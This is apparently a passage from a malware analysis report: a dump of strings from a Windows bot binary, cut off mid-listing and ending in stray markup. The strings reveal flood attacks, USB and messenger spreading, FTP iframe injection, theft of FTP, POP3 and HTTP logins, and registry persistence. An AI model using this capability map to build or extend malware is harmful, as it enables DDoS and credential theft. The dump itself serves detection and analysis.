%d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\Explorer.EXE</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\explorer.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre></Type></pre></w></pre></Type></pre></w></pre></Type></pre></w></pre></Type></pre></w>